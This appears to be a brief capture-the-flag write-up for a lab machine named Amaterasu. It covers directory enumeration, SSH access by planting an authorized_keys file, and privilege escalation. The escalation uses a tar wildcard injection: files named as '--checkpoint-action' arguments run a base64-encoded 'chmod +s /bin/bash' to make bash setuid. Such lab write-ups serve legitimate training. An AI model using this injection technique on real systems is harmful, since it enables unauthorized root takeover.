Amaterasu 🔹
Enumeration
Using feroxbuster on port 33414, we find /info and /help:
Initial Access
The user alfredo has a .ssh folder and there is an SSH port open, so we can try to upload an authorized_keys file with a public key inside.
Get the flag:
Privilege Escalation
Transfer pspy to the machine and we see a task executing.
We don't have permission to edit the script, but we see that tar is using a wildcard, so we can exploit that.
echo -n 'chmod +s /bin/bash' | base64
> Y2htb2QgK3MgL2Jpbi9iYXNo
touch -- "--checkpoint=1"
touch -- '--checkpoint-action=exec="echo Y2htb2QgK3MgL2Jpbi9iYXNo | base64 -d | bash"'
Post Exploitation
